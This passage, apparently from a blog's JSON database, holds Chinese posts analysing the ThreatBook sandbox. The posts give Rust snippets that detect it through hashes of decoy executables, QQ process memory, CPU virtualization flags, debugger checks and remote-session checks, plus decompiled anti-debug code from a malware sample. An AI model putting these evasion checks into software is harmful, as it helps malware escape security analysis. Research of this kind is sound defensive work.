(x86)\\`中\n\n![](../img/TBSandbox-Day1/image-20240404214212657.png)\n\n以上进程甚至有Viper和微点(微点都死多少年了还能被拉出来鞭尸)\n\n可以基本判断微步的沙箱会在两个程序目录放一堆假的exe用于进程欺诈.而且文件大小一致,开始令人怀疑是不是同一个文件了.于是糊了一个程序来测试\n\n```rust\nuse std::fs::File;\nuse std::io::{BufReader, Read};\nuse std::path::Path;\nuse sha2::{Digest, Sha256};\nuse walkdir::WalkDir;\nuse std::process::Command;\nfn calculate_sha256(file_path: &Path) -> String {\n    let file = File::open(file_path).expect(\"Failed to open file\");\n    let mut reader = BufReader::new(file);\n    let mut hasher = Sha256::new();\n\n    let mut buffer = [0; 1024];\n    loop {\n        let count = reader.read(&mut buffer).expect(\"Failed to read file\");\n        if count == 0 {\n            break;\n        }\n        hasher.update(&buffer[..count]);\n    }\n\n    let hash = hasher.finalize();\n    let hash_string: String = hash.iter().map(|byte| format!(\"{:02x}\", byte)).collect();\n    hash_string\n}\n\nfn main() {\n    let dir_path = \"C:\\\\Program Files\\\\\";\n    let walker = WalkDir::new(dir_path).min_depth(1).max_depth(1).into_iter();\n\n    for entry in walker.filter_map(|e| e.ok()) {\n        if entry.file_type().is_file() {\n            let file_path = entry.path();\n            let hash = calculate_sha256(file_path);\n            println!(\"{}: {}\", file_path.display(), hash);\n        }\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n![](../img/TBSandbox-Day1/image-20240404214236898.png)\n\n不得不承认,微步还是挺灵的.这回又给你塞了点安全狗 \n\n![](../img/TBSandbox-Day1/image-20240404214250316.png)\n\n所以绕过微步的灵车技巧可能就是通过判断哈希是否相同来搞了\n","slug":"TBSandbox-Day1","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bm00047dp826oe6i8h","content":"<h1 id=\"微步沙箱分析-Day1\"><a href=\"#微步沙箱分析-Day1\" class=\"headerlink\" title=\"微步沙箱分析-Day1\"></a>微步沙箱分析-Day1</h1><blockquote>\n<p>算是一篇简单的水文,主要是吐槽以前有人提出的 微步沙箱里面有CrowdStrike.  也不知道从哪看来的文章就开始信口开河.</p>\n</blockquote>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214152937.png\"></p>\n<p>纪念某泄露版CS</p>\n<h2 id=\"正文部分\"><a href=\"#正文部分\" class=\"headerlink\" title=\"正文部分\"></a>正文部分</h2><p>在查看进程中,总是能发现微步把奇奇怪怪的.exe塞到 <code>C:\\Program Files\\</code>和<code>C:\\Program Files (x86)\\</code>中</p>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214212657.png\"></p>\n<p>以上进程甚至有Viper和微点(微点都死多少年了还能被拉出来鞭尸)</p>\n<p>可以基本判断微步的沙箱会在两个程序目录放一堆假的exe用于进程欺诈.而且文件大小一致,开始令人怀疑是不是同一个文件了.于是糊了一个程序来测试</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::fs::File;<br><span class=\"hljs-keyword\">use</span> std::io::&#123;BufReader, Read&#125;;<br><span class=\"hljs-keyword\">use</span> std::path::Path;<br><span class=\"hljs-keyword\">use</span> sha2::&#123;Digest, Sha256&#125;;<br><span class=\"hljs-keyword\">use</span> walkdir::WalkDir;<br><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">calculate_sha256</span>(file_path: &amp;Path) <span class=\"hljs-punctuation\">-&gt;</span> <span class=\"hljs-type\">String</span> &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">file</span> = File::<span class=\"hljs-title function_ invoke__\">open</span>(file_path).<span class=\"hljs-title function_ invoke__\">expect</span>(<span class=\"hljs-string\">&quot;Failed to open file&quot;</span>);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">reader</span> = BufReader::<span class=\"hljs-title function_ invoke__\">new</span>(file);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">hasher</span> = Sha256::<span class=\"hljs-title function_ invoke__\">new</span>();<br><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">buffer</span> = [<span class=\"hljs-number\">0</span>; <span class=\"hljs-number\">1024</span>];<br>    <span class=\"hljs-keyword\">loop</span> &#123;<br>        <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">count</span> = reader.<span class=\"hljs-title function_ invoke__\">read</span>(&amp;<span class=\"hljs-keyword\">mut</span> buffer).<span class=\"hljs-title function_ invoke__\">expect</span>(<span class=\"hljs-string\">&quot;Failed to read file&quot;</span>);<br>        <span class=\"hljs-keyword\">if</span> count == <span class=\"hljs-number\">0</span> &#123;<br>            <span class=\"hljs-keyword\">break</span>;<br>        &#125;<br>        hasher.<span class=\"hljs-title function_ invoke__\">update</span>(&amp;buffer[..count]);<br>    &#125;<br><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash</span> = hasher.<span class=\"hljs-title function_ invoke__\">finalize</span>();<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash_string</span>: <span class=\"hljs-type\">String</span> = hash.<span class=\"hljs-title function_ invoke__\">iter</span>().<span class=\"hljs-title function_ invoke__\">map</span>(|byte| <span class=\"hljs-built_in\">format!</span>(<span class=\"hljs-string\">&quot;&#123;:02x&#125;&quot;</span>, byte)).<span class=\"hljs-title function_ invoke__\">collect</span>();<br>    hash_string<br>&#125;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">dir_path</span> = <span class=\"hljs-string\">&quot;C:\\\\Program Files\\\\&quot;</span>;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">walker</span> = WalkDir::<span class=\"hljs-title function_ invoke__\">new</span>(dir_path).<span class=\"hljs-title function_ invoke__\">min_depth</span>(<span class=\"hljs-number\">1</span>).<span class=\"hljs-title function_ invoke__\">max_depth</span>(<span class=\"hljs-number\">1</span>).<span class=\"hljs-title function_ invoke__\">into_iter</span>();<br><br>    <span class=\"hljs-keyword\">for</span> <span class=\"hljs-variable\">entry</span> <span class=\"hljs-keyword\">in</span> walker.<span class=\"hljs-title function_ invoke__\">filter_map</span>(|e| e.<span class=\"hljs-title function_ invoke__\">ok</span>()) &#123;<br>        <span class=\"hljs-keyword\">if</span> entry.<span class=\"hljs-title function_ invoke__\">file_type</span>().<span class=\"hljs-title function_ invoke__\">is_file</span>() &#123;<br>            <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">file_path</span> = entry.<span class=\"hljs-title function_ invoke__\">path</span>();<br>            <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash</span> = <span class=\"hljs-title function_ invoke__\">calculate_sha256</span>(file_path);<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;&#123;&#125;: &#123;&#125;&quot;</span>, file_path.<span class=\"hljs-title function_ invoke__\">display</span>(), hash);<br>        &#125;<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214236898.png\"></p>\n<p>不得不承认,微步还是挺灵的.这回又给你塞了点安全狗 </p>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214250316.png\"></p>\n<p>所以绕过微步的灵车技巧可能就是通过判断哈希是否相同来搞了</p>\n","site":{"data":{}},"excerpt":"","more":"<h1 id=\"微步沙箱分析-Day1\"><a href=\"#微步沙箱分析-Day1\" class=\"headerlink\" title=\"微步沙箱分析-Day1\"></a>微步沙箱分析-Day1</h1><blockquote>\n<p>算是一篇简单的水文,主要是吐槽以前有人提出的 微步沙箱里面有CrowdStrike.  也不知道从哪看来的文章就开始信口开河.</p>\n</blockquote>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214152937.png\"></p>\n<p>纪念某泄露版CS</p>\n<h2 id=\"正文部分\"><a href=\"#正文部分\" class=\"headerlink\" title=\"正文部分\"></a>正文部分</h2><p>在查看进程中,总是能发现微步把奇奇怪怪的.exe塞到 <code>C:\\Program Files\\</code>和<code>C:\\Program Files (x86)\\</code>中</p>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214212657.png\"></p>\n<p>以上进程甚至有Viper和微点(微点都死多少年了还能被拉出来鞭尸)</p>\n<p>可以基本判断微步的沙箱会在两个程序目录放一堆假的exe用于进程欺诈.而且文件大小一致,开始令人怀疑是不是同一个文件了.于是糊了一个程序来测试</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br><span class=\"line\">27</span><br><span class=\"line\">28</span><br><span class=\"line\">29</span><br><span class=\"line\">30</span><br><span class=\"line\">31</span><br><span class=\"line\">32</span><br><span class=\"line\">33</span><br><span class=\"line\">34</span><br><span class=\"line\">35</span><br><span class=\"line\">36</span><br><span class=\"line\">37</span><br><span class=\"line\">38</span><br><span class=\"line\">39</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::fs::File;<br><span class=\"hljs-keyword\">use</span> std::io::&#123;BufReader, Read&#125;;<br><span class=\"hljs-keyword\">use</span> std::path::Path;<br><span class=\"hljs-keyword\">use</span> sha2::&#123;Digest, Sha256&#125;;<br><span class=\"hljs-keyword\">use</span> walkdir::WalkDir;<br><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">calculate_sha256</span>(file_path: &amp;Path) <span class=\"hljs-punctuation\">-&gt;</span> <span class=\"hljs-type\">String</span> &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">file</span> = File::<span class=\"hljs-title function_ invoke__\">open</span>(file_path).<span class=\"hljs-title function_ invoke__\">expect</span>(<span class=\"hljs-string\">&quot;Failed to open file&quot;</span>);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">reader</span> = BufReader::<span class=\"hljs-title function_ invoke__\">new</span>(file);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">hasher</span> = Sha256::<span class=\"hljs-title function_ invoke__\">new</span>();<br><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-keyword\">mut </span><span class=\"hljs-variable\">buffer</span> = [<span class=\"hljs-number\">0</span>; <span class=\"hljs-number\">1024</span>];<br>    <span class=\"hljs-keyword\">loop</span> &#123;<br>        <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">count</span> = reader.<span class=\"hljs-title function_ invoke__\">read</span>(&amp;<span class=\"hljs-keyword\">mut</span> buffer).<span class=\"hljs-title function_ invoke__\">expect</span>(<span class=\"hljs-string\">&quot;Failed to read file&quot;</span>);<br>        <span class=\"hljs-keyword\">if</span> count == <span class=\"hljs-number\">0</span> &#123;<br>            <span class=\"hljs-keyword\">break</span>;<br>        &#125;<br>        hasher.<span class=\"hljs-title function_ invoke__\">update</span>(&amp;buffer[..count]);<br>    &#125;<br><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash</span> = hasher.<span class=\"hljs-title function_ invoke__\">finalize</span>();<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash_string</span>: <span class=\"hljs-type\">String</span> = hash.<span class=\"hljs-title function_ invoke__\">iter</span>().<span class=\"hljs-title function_ invoke__\">map</span>(|byte| <span class=\"hljs-built_in\">format!</span>(<span class=\"hljs-string\">&quot;&#123;:02x&#125;&quot;</span>, byte)).<span class=\"hljs-title function_ invoke__\">collect</span>();<br>    hash_string<br>&#125;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">dir_path</span> = <span class=\"hljs-string\">&quot;C:\\\\Program Files\\\\&quot;</span>;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">walker</span> = WalkDir::<span class=\"hljs-title function_ invoke__\">new</span>(dir_path).<span class=\"hljs-title function_ invoke__\">min_depth</span>(<span class=\"hljs-number\">1</span>).<span class=\"hljs-title function_ invoke__\">max_depth</span>(<span class=\"hljs-number\">1</span>).<span class=\"hljs-title function_ invoke__\">into_iter</span>();<br><br>    <span class=\"hljs-keyword\">for</span> <span class=\"hljs-variable\">entry</span> <span class=\"hljs-keyword\">in</span> walker.<span class=\"hljs-title function_ invoke__\">filter_map</span>(|e| e.<span class=\"hljs-title function_ invoke__\">ok</span>()) &#123;<br>        <span class=\"hljs-keyword\">if</span> entry.<span class=\"hljs-title function_ invoke__\">file_type</span>().<span class=\"hljs-title function_ invoke__\">is_file</span>() &#123;<br>            <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">file_path</span> = entry.<span class=\"hljs-title function_ invoke__\">path</span>();<br>            <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">hash</span> = <span class=\"hljs-title function_ invoke__\">calculate_sha256</span>(file_path);<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;&#123;&#125;: &#123;&#125;&quot;</span>, file_path.<span class=\"hljs-title function_ invoke__\">display</span>(), hash);<br>        &#125;<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214236898.png\"></p>\n<p>不得不承认,微步还是挺灵的.这回又给你塞了点安全狗 </p>\n<p><img src=\"/../img/TBSandbox-Day1/image-20240404214250316.png\"></p>\n<p>所以绕过微步的灵车技巧可能就是通过判断哈希是否相同来搞了</p>\n"},{"title":"TBSandbox-Day2.5","date":"2024-04-05T13:35:29.000Z","_content":"\n# 微步沙箱分析-Day2.5\n\n> 这是Day2.5 用来总结一些奇淫艺技用的\n\n## QQ内存大小判断法\n\n之前有人说可以使用检查QQ内存大小来判断是否为微步沙箱\n\n于是我们来测试下看看 糊了一个程序\n\n```rust\nuse std::process::Command;\nuse sysinfo::{System};\nfn main() {\n    println!(\"Hello, world!\");\n    let s = System::new_all();\n    for (_pid,process) in s.processes(){\n        let process_name = process.name();\n        if process_name == \"QQ.exe\" {\n            println!(\"Process name is {} Memory is {}\",process_name,process.memory())\n        }\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n![](../img/TBSandbox-Day2-5/image-20240405222531691.png)\n\n结果是可行的，QQ只存在单进程且仅有2MB.且通过这个方法似乎可以使微步执行超时？\n\n喂了避免使用CreateToolhelp32Snapshot造成沙箱生成遍历进程的指标.在这里用到了sysinfo\n\n## 子进程判断法\n\n![](../img/TBSandbox-Day2-5/image-20240407144934392.png)\n\n微步会把奇奇怪怪的进程都塞给Explorer.exe 所以可以通过这个方法简易的判断一下\n\n\n\n## CPU判断\n\n```rust\nuse std::process::Command;\nuse raw_cpuid::CpuId;\n\nfn main() {\n    // 创建 CPUID 对象\n    let cpuid = CpuId::new();\n\n    // 查询 CPU 型号和制造商信息\n    if let Some(brand_string) = cpuid.get_processor_brand_string()\n    {\n        println!(\"CPU 型号: {}\", brand_string.as_str());\n    } else {\n        println!(\"无法获取 CPU 型号信息\");\n    }\n    if let Some(feature_info) = cpuid.get_feature_info() {\n        if feature_info.has_vmx() || feature_info.has_avx() {\n            println!(\"CPU 支持虚拟化\");\n        } else {\n            println!(\"CPU 不支持虚拟化\");\n        }\n    } else {\n        println!(\"无法获取 CPU 特性信息\");\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n\n\n## 来看看样本吧  未完待续（ 打群星去了\n\n![](../img/TBSandbox-Day2-5/image-20240406161627494.png)\n\n也不知道是不是上次那哥们传的 就用这个分析以下看看吧\n\n### 反调试\n\n```c\n  if ( IsDebuggerPresent() )   //检测当前进程是否正在被调试器调试\n    goto LABEL_2;\n  pbDebuggerPresent = 0;\n  CurrentProcess = GetCurrentProcess();\n  if ( CheckRemoteDebuggerPresent(CurrentProcess, &pbDebuggerPresent) )   //检测是否正在被远程调试器调试\n  {\n    if ( pbDebuggerPresent )\n      goto LABEL_2;\n  }\n```\n\n糊一个调试器的测试代码吧 远程调试器就不写了\n\n```rust\nextern crate winapi;\n\nuse winapi::um::winuser::IsDebuggerPresent;\n\nfn main() {\n    let debugger_present = unsafe { IsDebuggerPresent() };\n    if debugger_present != 0 {\n        println!(\"Debugger is present.\");\n    } else {\n        println!(\"Debugger is not present.\");\n    }\n}\n```\n\n### 判断是否为远程链接\n\n```c\n  if ( GetSystemMetrics(4096) )\n    goto LABEL_2;\n```\n\n通过**GetSystemMetrics(SM_REMOTESESSION)**来判断是否为远程桌面.\n\n```rust\nextern crate winapi;\n\nuse winapi::um::winuser::GetSystemMetrics;\n\nfn main() {\n    let remote_session = unsafe { GetSystemMetrics(4096) };\n    if remote_session != 0 {\n        println!(\"Current session is a remote session.\");\n    } else {\n        println!(\"Current session is not a remote session.\");\n    }\n}\n```\n\n\n\n![](../img/TBSandbox-Day2-5/image-20240406163153287.png)\n","source":"_posts/TBSandbox-Day2-5.md","raw":"---\ntitle: TBSandbox-Day2.5\ndate: 2024-04-05 21:35:29\ntags: 沙箱分析\n---\n\n# 微步沙箱分析-Day2.5\n\n> 这是Day2.5 用来总结一些奇淫艺技用的\n\n## QQ内存大小判断法\n\n之前有人说可以使用检查QQ内存大小来判断是否为微步沙箱\n\n于是我们来测试下看看 糊了一个程序\n\n```rust\nuse std::process::Command;\nuse sysinfo::{System};\nfn main() {\n    println!(\"Hello, world!\");\n    let s = System::new_all();\n    for (_pid,process) in s.processes(){\n        let process_name = process.name();\n        if process_name == \"QQ.exe\" {\n            println!(\"Process name is {} Memory is {}\",process_name,process.memory())\n        }\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n![](../img/TBSandbox-Day2-5/image-20240405222531691.png)\n\n结果是可行的，QQ只存在单进程且仅有2MB.且通过这个方法似乎可以使微步执行超时？\n\n喂了避免使用CreateToolhelp32Snapshot造成沙箱生成遍历进程的指标.在这里用到了sysinfo\n\n## 子进程判断法\n\n![](../img/TBSandbox-Day2-5/image-20240407144934392.png)\n\n微步会把奇奇怪怪的进程都塞给Explorer.exe 所以可以通过这个方法简易的判断一下\n\n\n\n## CPU判断\n\n```rust\nuse std::process::Command;\nuse raw_cpuid::CpuId;\n\nfn main() {\n    // 创建 CPUID 对象\n    let cpuid = CpuId::new();\n\n    // 查询 CPU 型号和制造商信息\n    if let Some(brand_string) = cpuid.get_processor_brand_string()\n    {\n        println!(\"CPU 型号: {}\", brand_string.as_str());\n    } else {\n        println!(\"无法获取 CPU 型号信息\");\n    }\n    if let Some(feature_info) = cpuid.get_feature_info() {\n        if feature_info.has_vmx() || feature_info.has_avx() {\n            println!(\"CPU 支持虚拟化\");\n        } else {\n            println!(\"CPU 不支持虚拟化\");\n        }\n    } else {\n        println!(\"无法获取 CPU 特性信息\");\n    }\n    let _ = Command::new(\"cmd.exe\").arg(\"/c\").arg(\"pause\").status();\n}\n\n```\n\n\n\n## 来看看样本吧  未完待续（ 打群星去了\n\n![](../img/TBSandbox-Day2-5/image-20240406161627494.png)\n\n也不知道是不是上次那哥们传的 就用这个分析以下看看吧\n\n### 反调试\n\n```c\n  if ( IsDebuggerPresent() )   //检测当前进程是否正在被调试器调试\n    goto LABEL_2;\n  pbDebuggerPresent = 0;\n  CurrentProcess = GetCurrentProcess();\n  if ( CheckRemoteDebuggerPresent(CurrentProcess, &pbDebuggerPresent) )   //检测是否正在被远程调试器调试\n  {\n    if ( pbDebuggerPresent )\n      goto LABEL_2;\n  }\n```\n\n糊一个调试器的测试代码吧 远程调试器就不写了\n\n```rust\nextern crate winapi;\n\nuse winapi::um::winuser::IsDebuggerPresent;\n\nfn main() {\n    let debugger_present = unsafe { IsDebuggerPresent() };\n    if debugger_present != 0 {\n        println!(\"Debugger is present.\");\n    } else {\n        println!(\"Debugger is not present.\");\n    }\n}\n```\n\n### 判断是否为远程链接\n\n```c\n  if ( GetSystemMetrics(4096) )\n    goto LABEL_2;\n```\n\n通过**GetSystemMetrics(SM_REMOTESESSION)**来判断是否为远程桌面.\n\n```rust\nextern crate winapi;\n\nuse winapi::um::winuser::GetSystemMetrics;\n\nfn main() {\n    let remote_session = unsafe { GetSystemMetrics(4096) };\n    if remote_session != 0 {\n        println!(\"Current session is a remote session.\");\n    } else {\n        println!(\"Current session is not a remote session.\");\n    }\n}\n```\n\n\n\n![](../img/TBSandbox-Day2-5/image-20240406163153287.png)\n","slug":"TBSandbox-Day2-5","published":1,"updated":"2025-02-12T15:31:51.312Z","comments":1,"layout":"post","photos":[],"link":"","_id":"cm722r5bm00057dp8ewbtcfs2","content":"<h1 id=\"微步沙箱分析-Day2-5\"><a href=\"#微步沙箱分析-Day2-5\" class=\"headerlink\" title=\"微步沙箱分析-Day2.5\"></a>微步沙箱分析-Day2.5</h1><blockquote>\n<p>这是Day2.5 用来总结一些奇淫艺技用的</p>\n</blockquote>\n<h2 id=\"QQ内存大小判断法\"><a href=\"#QQ内存大小判断法\" class=\"headerlink\" title=\"QQ内存大小判断法\"></a>QQ内存大小判断法</h2><p>之前有人说可以使用检查QQ内存大小来判断是否为微步沙箱</p>\n<p>于是我们来测试下看看 糊了一个程序</p>\n<figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">use</span> sysinfo::&#123;System&#125;;<br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Hello, world!&quot;</span>);<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">s</span> = System::<span class=\"hljs-title function_ invoke__\">new_all</span>();<br>    <span class=\"hljs-title function_ invoke__\">for</span> (_pid,process) <span class=\"hljs-keyword\">in</span> s.<span class=\"hljs-title function_ invoke__\">processes</span>()&#123;<br>        <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">process_name</span> = process.<span class=\"hljs-title function_ invoke__\">name</span>();<br>        <span class=\"hljs-keyword\">if</span> process_name == <span class=\"hljs-string\">&quot;QQ.exe&quot;</span> &#123;<br>            <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;Process name is &#123;&#125; Memory is &#123;&#125;&quot;</span>,process_name,process.<span class=\"hljs-title function_ invoke__\">memory</span>())<br>        &#125;<br>    &#125;<br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">_</span> = Command::<span class=\"hljs-title function_ invoke__\">new</span>(<span class=\"hljs-string\">&quot;cmd.exe&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;/c&quot;</span>).<span class=\"hljs-title function_ invoke__\">arg</span>(<span class=\"hljs-string\">&quot;pause&quot;</span>).<span class=\"hljs-title function_ invoke__\">status</span>();<br>&#125;<br><br></code></pre></td></tr></table></figure>\n\n<p><img src=\"/../img/TBSandbox-Day2-5/image-20240405222531691.png\"></p>\n<p>结果是可行的，QQ只存在单进程且仅有2MB.且通过这个方法似乎可以使微步执行超时？</p>\n<p>喂了避免使用CreateToolhelp32Snapshot造成沙箱生成遍历进程的指标.在这里用到了sysinfo</p>\n<h2 id=\"子进程判断法\"><a href=\"#子进程判断法\" class=\"headerlink\" title=\"子进程判断法\"></a>子进程判断法</h2><p><img src=\"/../img/TBSandbox-Day2-5/image-20240407144934392.png\"></p>\n<p>微步会把奇奇怪怪的进程都塞给Explorer.exe 所以可以通过这个方法简易的判断一下</p>\n<h2 id=\"CPU判断\"><a href=\"#CPU判断\" class=\"headerlink\" title=\"CPU判断\"></a>CPU判断</h2><figure class=\"highlight rust\"><table><tr><td class=\"gutter\"><pre><span class=\"line\">1</span><br><span class=\"line\">2</span><br><span class=\"line\">3</span><br><span class=\"line\">4</span><br><span class=\"line\">5</span><br><span class=\"line\">6</span><br><span class=\"line\">7</span><br><span class=\"line\">8</span><br><span class=\"line\">9</span><br><span class=\"line\">10</span><br><span class=\"line\">11</span><br><span class=\"line\">12</span><br><span class=\"line\">13</span><br><span class=\"line\">14</span><br><span class=\"line\">15</span><br><span class=\"line\">16</span><br><span class=\"line\">17</span><br><span class=\"line\">18</span><br><span class=\"line\">19</span><br><span class=\"line\">20</span><br><span class=\"line\">21</span><br><span class=\"line\">22</span><br><span class=\"line\">23</span><br><span class=\"line\">24</span><br><span class=\"line\">25</span><br><span class=\"line\">26</span><br></pre></td><td class=\"code\"><pre><code class=\"hljs rust\"><span class=\"hljs-keyword\">use</span> std::process::Command;<br><span class=\"hljs-keyword\">use</span> raw_cpuid::CpuId;<br><br><span class=\"hljs-keyword\">fn</span> <span class=\"hljs-title function_\">main</span>() &#123;<br>    <span class=\"hljs-comment\">// 创建 CPUID 对象</span><br>    <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">cpuid</span> = CpuId::<span class=\"hljs-title function_ invoke__\">new</span>();<br><br>    <span class=\"hljs-comment\">// 查询 CPU 型号和制造商信息</span><br>    <span class=\"hljs-keyword\">if</span> <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">Some</span>(brand_string) = cpuid.<span class=\"hljs-title function_ invoke__\">get_processor_brand_string</span>()<br>    &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;CPU 型号: &#123;&#125;&quot;</span>, brand_string.<span class=\"hljs-title function_ invoke__\">as_str</span>());<br>    &#125; <span class=\"hljs-keyword\">else</span> &#123;<br>        <span class=\"hljs-built_in\">println!</span>(<span class=\"hljs-string\">&quot;无法获取 CPU 型号信息&quot;</span>);<br>    &#125;<br>    <span class=\"hljs-keyword\">if</span> <span class=\"hljs-keyword\">let</span> <span class=\"hljs-variable\">Some</span>(feature_info) = cpuid.<span class=\"hljs-title function_ invoke__\">get_feature_info</span>() &#123;<br>        <span class=\"hljs-keyword\">if</span> feature_info.<span class=\"hljs-title function_ invoke__\">has_vmx</span>() || feature_info.<span class=\"hljs-title function_ invoke__\">has_avx</span>() &#123;<br>            <span 